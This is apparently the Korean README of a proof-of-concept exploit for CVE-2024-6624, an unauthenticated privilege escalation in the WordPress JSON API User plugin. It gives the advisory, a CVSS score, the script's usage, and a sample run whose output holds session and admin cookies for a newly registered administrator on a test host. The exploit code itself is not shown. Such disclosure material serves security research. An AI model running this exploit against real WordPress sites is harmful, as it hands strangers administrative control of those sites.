
JSON API User <= 3.9.3 - 인증되지 않은 권한 상승
JSON API User <= 3.9.3 - 인증되지 않은 권한 상승
JSON API User WordPress 플러그인은 버전 3.9.3까지의 모든 버전에서 권한 상승에 취약합니다. 이는 사용자 정의 메타 필드에 대한 부적절한 제어 때문입니다. 이로 인해 인증되지 않은 공격자가 사이트에서 관리자로 등록할 수 있습니다. 이 플러그인은 JSON API 플러그인도 설치되어 있어야 합니다.
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Privileges: None
Attack Vector: None
References:
- https://plugins.trac.wordpress.org/browser/json-api-user/trunk/controllers/User.php#L51
- https://plugins.trac.wordpress.org/changeset/3115185/
- https://plugins.trac.wordpress.org/browser/json-api-user/trunk/controllers/User.php#L187
usage: CVE-2024-6624.py [-h] -u URL [-un USERNAME] [-p PASSWORD]
WordPress User Management Script
options:
-h, --help show this help message and exit
-u URL, --url URL Website URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
python3 CVE-2024-6624.py -u http://kubernetes.docker.internal -un test -p testest123
Registration Response:
{
"status": "ok",
"cookie": "test|1727176928|2KSZ0T0maNhdNfQwcwgqForXPZpfGXuC8XHaje57whM|e724bfd3ee1103a9ba8431cd357ca5cd5387f836f3cb3c761050bd4a0a0e7b56",
"cookie_admin": "test|1727176928|tOXMV0zq3m368KcQzNaw5zbdGBoYYrrIByOAGWX6gdo|9b003b21babd93c4490fc6ace4b768c2201317957dd0f7c1766c142cfb5f2647",
"cookie_name": "wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa",
"user_id": 41,
"username": "test"
}
이제 http://kubernetes.docker.internal 에 사용자 이름 test와 비밀번호 testest123을 가진 관리자 권한의 새 사용자가 등록되었을 것입니다.